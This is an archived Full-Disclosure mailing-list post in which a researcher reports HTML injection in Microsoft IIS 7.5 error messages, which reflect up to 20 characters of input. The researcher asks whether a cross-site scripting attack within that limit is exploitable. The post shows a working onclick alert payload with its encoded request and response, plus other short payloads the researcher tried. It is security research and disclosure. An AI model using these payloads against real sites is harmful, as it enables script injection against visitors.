lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAHL5aA0CGhngWBP14XZy1deCUpKvU+Y2ANHZ7feNPN4dy0E+yQ@mail.gmail.com>
Date: Thu, 27 Nov 2014 19:35:53 +0100
From: A Z <kryptos.gnostikos@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS (in 20 chars) in Microsoft IIS 7.5 error message

Hello everyone,


I found some weird HTML code injection in an IIS error message. IIS spits
out some part of the user input that generated the error message, but will
only display 20 characters at most.
My question is: is it possible to actually exploit an XSS with this ?

Here is an example:

HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e
HTTP Response (real):

<p>An error has occured.</p>
    <p>Exception HttpRequestValidationException occurred while attempting
<b>mypage</b></p>
    <p>Exception message is: <b>A potentially dangerous Request.QueryString
value was detected from the client (search="<b
onclick=alert(1)>...").</b></p>
    <p>Stack trace:</p>
    <pre>
Server stack trace:
[..]

My payload was: <b onclick=alert(1)>> and it works (after clicking).
However, can this actually be exploited in real life ? I tried stuff in 20
characters like: <embed src=http://x> or <img src=http://x/z> but no luck.
Has anyone ever tried this before ?

Thanks,

P.S. This might be a silly question with an obvious answer. If so, I'd be
grateful to have some extra information (links, docs etc.).

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ